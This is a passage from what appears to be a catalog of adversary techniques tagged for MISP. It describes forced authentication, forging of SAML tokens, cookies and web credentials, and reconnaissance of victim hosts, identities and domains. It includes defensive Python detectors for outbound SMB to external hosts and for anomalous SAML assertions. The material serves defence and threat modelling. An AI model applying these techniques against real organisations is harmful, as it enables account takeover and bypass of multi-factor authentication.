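    "ts=2024-01-01T09:00:02Z action=allow proto=tcp src=10.0.5.23 dst=198.51.100.7 dport=445",
    "ts=2024-01-01T09:00:03Z action=allow proto=tcp src=10.0.5.23 dst=198.51.100.7 dport=443",
    "ts=2024-01-01T09:00:04Z action=allow proto=udp src=10.0.5.23 dst=198.51.100.7 dport=445",
    "ts=2024-01-01T09:00:05Z action=deny proto=tcp src=10.0.7.9 dst=198.51.100.8 dport=139",
]

if __name__ == "__main__":
    for src, dsts in outbound_smb_to_external(SAMPLE_LOG).items():
        print(f"{src} opened SMB to external host(s): {', '.join(dsts)}")
```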

There are several different ways this can occur. <sup>[[Osanda Stealing NetNTLM Hashes](https://app.tidalcyber.com/references/991f885e-b3f4-4f3f-b0f9-c9862f918f36)]</sup> Some specifics from in-the-wild use include:

The tag is: misp-galaxy:technique="Forced Authentication"

SAML Tokens

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.<sup>[[Microsoft SolarWinds Steps](https://app.tidalcyber.com/references/33e84eb1-4835-404b-8c1a-40695c04cdb4)]</sup> The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.<sup>[[Microsoft SAML Token Lifetimes](https://app.tidalcyber.com/references/8b810f7c-1f26-420b-9014-732f1469f145)]</sup> Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.<sup>[[Cyberark Golden SAML](https://app.tidalcyber.com/references/58083370-8126-47d3-827c-1910ed3f4b2a)]</sup>

An adversary may utilize [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) to compromise an organization’s token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup> This differs from [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup>
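A relying party can catch the two properties a forgery controls: a validity window in the token's <code>conditions</code> element that exceeds the one-hour default policy, and a token-signing certificate that is not the identity provider's known one. The check below is an added defensive example (not from the page, Microsoft or CyberArk); the assertion XML, certificates and fingerprints are constructed placeholders, and cryptographic verification of the XML signature is assumed to be done separately.

```python
"""Flag SAML 2.0 assertions whose lifetime or signing certificate is anomalous.
Example code added for illustration; all inputs below are constructed."""
import base64
import hashlib
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

NS = {
    "saml": "urn:oasis:names:tc:SAML:2.0:assertion",
    "ds": "http://www.w3.org/2000/09/xmldsig#",
}
# Policy: the default SAML token lifetime is one hour; anything longer is
# either a deliberate AccessTokenLifetime change or a forged token.
MAX_LIFETIME = timedelta(hours=1)


def _parse_time(value: str) -> datetime:
    # SAML timestamps are xsd:dateTime in UTC, e.g. 2024-01-01T12:00:00Z
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def cert_fingerprint(cert_b64: str) -> str:
    """SHA-256 over the DER bytes carried in ds:X509Certificate."""
    der = base64.b64decode("".join(cert_b64.split()))
    return hashlib.sha256(der).hexdigest()


def check_assertion(xml_text, trusted_fingerprints, now, max_lifetime=MAX_LIFETIME):
    """Return a list of findings; an empty list means nothing suspicious."""
    root = ET.fromstring(xml_text)
    findings = []
    cond = root.find("saml:Conditions", NS)
    if cond is None:
        return ["no Conditions element: token has no validity window"]
    nb, noa = cond.get("NotBefore"), cond.get("NotOnOrAfter")
    if nb is None or noa is None:
        return ["Conditions lacks NotBefore/NotOnOrAfter"]
    not_before, not_on_or_after = _parse_time(nb), _parse_time(noa)
    lifetime = not_on_or_after - not_before
    if lifetime > max_lifetime:
        findings.append(f"lifetime {lifetime} exceeds policy maximum {max_lifetime}")
    if not (not_before <= now < not_on_or_after):
        findings.append("token not valid at evaluation time")
    cert = root.find(".//ds:X509Certificate", NS)
    if cert is None or not cert.text:
        findings.append("no signing certificate in assertion")
    elif cert_fingerprint(cert.text) not in trusted_fingerprints:
        findings.append("signing certificate not in the allowlist")
    return findings


# Constructed placeholders standing in for DER certificates.
LEGIT_CERT_B64 = base64.b64encode(b"constructed placeholder: IdP token-signing cert").decode()
ROGUE_CERT_B64 = base64.b64encode(b"constructed placeholder: attacker-made signing cert").decode()
TRUSTED = {cert_fingerprint(LEGIT_CERT_B64)}
NOW = datetime(2024, 1, 1, 12, 30, tzinfo=timezone.utc)


def make_assertion(cert_b64, not_before, not_on_or_after):
    """Build a minimal (unsigned) assertion skeleton for the check above."""
    return f"""<saml:Assertion xmlns:saml="{NS['saml']}" xmlns:ds="{NS['ds']}"
    ID="_constructed" Version="2.0" IssueInstant="{not_before}">
  <saml:Issuer>https://sts.example.test/adfs/services/trust</saml:Issuer>
  <ds:Signature><ds:KeyInfo><ds:X509Data>
    <ds:X509Certificate>{cert_b64}</ds:X509Certificate>
  </ds:X509Data></ds:KeyInfo></ds:Signature>
  <saml:Subject><saml:NameID>user@example.test</saml:NameID></saml:Subject>
  <saml:Conditions NotBefore="{not_before}" NotOnOrAfter="{not_on_or_after}"/>
</saml:Assertion>"""


def demo():
    """Legitimate one-hour token versus a one-year token under an unknown cert."""
    legit = make_assertion(LEGIT_CERT_B64, "2024-01-01T12:00:00Z", "2024-01-01T13:00:00Z")
    forged = make_assertion(ROGUE_CERT_B64, "2024-01-01T12:00:00Z", "2025-01-01T12:00:00Z")
    return check_assertion(legit, TRUSTED, NOW), check_assertion(forged, TRUSTED, NOW)


if __name__ == "__main__":
    for label, findings in zip(("legitimate", "forged"), demo()):
        print(label, "->", findings or "no findings")
```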

The tag is: misp-galaxy:technique="SAML Tokens"

Web Cookies

Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access.

Adversaries may generate these cookies in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e) and other similar behaviors in that the cookies are new and forged by the adversary, rather than stolen or intercepted from legitimate users. Most common web applications have standardized and documented cookie values that can be generated using provided tools or interfaces.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup> The generation of web cookies often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.

Once forged, adversaries may use these web cookies to access resources ([Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1)), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Volexity SolarWinds](https://app.tidalcyber.com/references/355cecf8-ef3e-4a6e-a652-3bf26fe46d88)]</sup><sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup>

The tag is: misp-galaxy:technique="Web Cookies"

Forge Web Credentials

Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.

Adversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e), [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

The generation of web credentials often requires secret values, such as passwords, [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a), or other cryptographic seed values.<sup>[[GitHub AWS-ADFS-Credential-Generator](https://app.tidalcyber.com/references/340a3a20-0ee1-4fd8-87ab-10ac0d2a50c8)]</sup> Adversaries may also forge tokens by taking advantage of features such as the AssumeRole and GetFederationToken APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd)), or the zmprov gdpak command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.<sup>[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)]</sup><sup>[[Zimbra Preauth](https://app.tidalcyber.com/references/f8931e8d-9a03-5407-857a-2a1c5a895eed)]</sup>

Once forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://app.tidalcyber.com/technique/28f65214-95c1-4a72-b385-0b32cbcaea8f)), which may bypass multi-factor and other authentication protection mechanisms.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup><sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup><sup>[[Microsoft SolarWinds Customer Guidance](https://app.tidalcyber.com/references/b486ae40-a854-4998-bf1b-aaf6ea2047ed)]</sup>

The tag is: misp-galaxy:technique="Forge Web Credentials"

Client Configurations

Adversaries may gather information about the victim’s client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Client Configurations"

Firmware

Adversaries may gather information about the victim’s host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about host firmware may only be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices).<sup>[[ArsTechnica Intel](https://app.tidalcyber.com/references/99151b50-3dd8-47b5-a48f-2e3b450944e9)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a)).

The tag is: misp-galaxy:technique="Firmware"

Hardware

Adversaries may gather information about the victim’s host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: hostnames, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the hardware infrastructure may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Compromise Hardware Supply Chain](https://app.tidalcyber.com/technique/53fea37d-be26-4bed-a8a1-1d67f7cbffcf) or [Hardware Additions](https://app.tidalcyber.com/technique/4557bfb9-b940-49b6-b8be-571979134419)).

The tag is: misp-galaxy:technique="Hardware"

Software

Adversaries may gather information about the victim’s host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about the installed software may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or for initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Software"

Gather Victim Host Information

Adversaries may gather information about the victim’s hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.).

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Information about hosts may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)), establishing operational resources (ex: [Develop Capabilities](https://app.tidalcyber.com/technique/bf660248-2098-499b-b90c-8c47efb26c70) or [Obtain Capabilities](https://app.tidalcyber.com/technique/a6740db8-10d6-4e5b-986b-7695d3fc4b85)), and/or initial access (ex: [Supply Chain Compromise](https://app.tidalcyber.com/technique/b72c8a96-5e03-40c2-ac0c-f77b73fe493f) or [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Gather Victim Host Information"

Credentials

Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.

Adversaries may gather credentials from potential victims in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Adversaries may also compromise sites then add malicious content designed to collect website authentication cookies from visitors.<sup>[[ATT ScanBox](https://app.tidalcyber.com/references/48753fc9-b7b7-465f-92a7-fb3f51b032cb)]</sup> Credential information may also be exposed to adversaries via leaks to online or other accessible data sets (ex: [Search Engines](https://app.tidalcyber.com/technique/62bc11f9-f88c-437a-98ae-e90def576e7e), breach dumps, code repositories, etc.).<sup>[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)]</sup><sup>[[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)]</sup><sup>[[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)]</sup><sup>[[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)]</sup><sup>[[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)]</sup><sup>[[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup> Adversaries may also purchase credentials from dark web or other black-markets. Finally, where multi-factor authentication (MFA) based on out-of-band communications is in use, adversaries may compromise a service provider to gain access to MFA codes and one-time passwords (OTP).<sup>[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]</sup>

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Credentials"

Email Addresses

Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.

Adversaries may easily gather email addresses, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[HackersArise Email](https://app.tidalcyber.com/references/b6aefd99-fd97-4ca0-b717-f9dc147c9413)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup> Email addresses could also be enumerated via more active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)), such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.<sup>[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)]</sup> For example, adversaries may be able to enumerate email addresses in Office 365 environments by querying a variety of publicly available API endpoints, such as autodiscover and GetCredentialType.<sup>[[GitHub Office 365 User Enumeration](https://app.tidalcyber.com/references/314fb591-d5f2-4f0c-ab0b-97977308b5dc)]</sup><sup>[[Azure Active Directory Reconnaisance](https://app.tidalcyber.com/references/42dad2a3-5b33-4be4-a19b-58a27fb3ee5d)]</sup>

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Email Accounts](https://app.tidalcyber.com/technique/49ae7bf1-a313-41d6-ad4c-74efc4c80ab6)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) via [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="Email Addresses"

Employee Names

Adversaries may gather employee names that can be used during targeting. Employee names may be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.

Adversaries may easily gather employee names, since they may be readily available and exposed via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[OPM Leak](https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Employee Names"

Gather Victim Identity Information

Adversaries may gather information about the victim’s identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.

Adversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.<sup>[[GrimBlog UsernameEnum](https://app.tidalcyber.com/references/cab25908-63da-484d-8c42-4451f46086e2)]</sup> Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://app.tidalcyber.com/technique/d97c3d34-1210-4c71-b305-59dcccab8f45) or [Search Victim-Owned Websites](https://app.tidalcyber.com/technique/c55c0462-d59f-4bd8-9728-05cf711917b0)).<sup>[[OPM Leak](https://app.tidalcyber.com/references/b67ed4e9-ed44-460a-bd59-c978bdfda32f)]</sup><sup>[[Register Deloitte](https://app.tidalcyber.com/references/e6b10687-8666-4c9c-ac77-1988378e096d)]</sup><sup>[[Register Uber](https://app.tidalcyber.com/references/89b85928-a962-4230-875c-63742b3c9d37)]</sup><sup>[[Detectify Slack Tokens](https://app.tidalcyber.com/references/46c40ed4-5a15-4b38-b625-bebc569dbf69)]</sup><sup>[[Forbes GitHub Creds](https://app.tidalcyber.com/references/303f8801-bdd6-4a0c-a90a-37867898c99c)]</sup><sup>[[GitHub truffleHog](https://app.tidalcyber.com/references/324a563f-55ee-49e9-9fc7-2b8e35f36875)]</sup><sup>[[GitHub Gitrob](https://app.tidalcyber.com/references/1dee0842-15cc-4835-b8a8-938e0c94807b)]</sup><sup>[[CNET Leaks](https://app.tidalcyber.com/references/46df3a49-e7c4-4169-b35c-0aecc78c31ea)]</sup>

Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06)), establishing operational resources (ex: [Compromise Accounts](https://app.tidalcyber.com/technique/c6374cbe-799a-4648-b1e2-2a66bb42d3f3)), and/or initial access (ex: [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533) or [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406)).

The tag is: misp-galaxy:technique="Gather Victim Identity Information"

DNS

Adversaries may gather information about the victim’s DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. DNS, MX, TXT, and SPF records may also reveal the use of third party cloud and SaaS providers, such as Office 365, G Suite, Salesforce, or Zendesk.<sup>[[Sean Metcalf Twitter DNS Records](https://app.tidalcyber.com/references/c7482430-58f9-4365-a7c6-d17067b257e4)]</sup>

Adversaries may gather this information in various ways, such as querying or otherwise collecting details via [DNS/Passive DNS](https://app.tidalcyber.com/technique/758ad44d-5e29-4c7f-8dae-ddfeb5092ccb). DNS information may also be exposed to adversaries via online or other accessible data sets (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439)).<sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://app.tidalcyber.com/technique/cf79ad1b-a82b-486b-88ad-e93bfc1c7439), [Search Open Websites/Domains](https://app.tidalcyber.com/technique/f2d216e3-43d6-4a2e-aa5b-d6be78d018b6), or [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85)), establishing operational resources (ex: [Acquire Infrastructure](https://app.tidalcyber.com/technique/66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3) or [Compromise Infrastructure](https://app.tidalcyber.com/technique/c12d81d3-abe4-43d7-8a65-f4b3150e722d)), and/or initial access (ex: [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4)).

The tag is: misp-galaxy:technique="DNS"

Domain Properties

Adversaries may gather information about the victim’s network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://app.tidalcyber.com/technique/a930437d-5a12-4dc4-b311-f5fd6a766c85) or [Phishing for Information](https://app.tidalcyber.com/technique/b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: WHOIS).<sup>[[WHOIS](https://app.tidalcyber.com/references/fa6cba30-66e9-4a6b-85e8-a8c3773a3efe)]</sup><sup>[[DNS Dumpster](https://app.tidalcyber.com/references/0bbe1e50-28af-4265-a493-4bb4fd693bad)]</sup><sup>[[Circl Passive DNS](https://app.tidalcyber.com/references/c19f8683-97fb-4e0c-a9f5-12033b1d38ca)]</sup> Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.<sup>[[Azure Active Directory Reconnaisance](https://app.tidalcyber.com/references/42dad2a3-5b33-4be4-a19b-58a27fb3ee5d)]</sup><sup>[[Office 265 Azure Domain 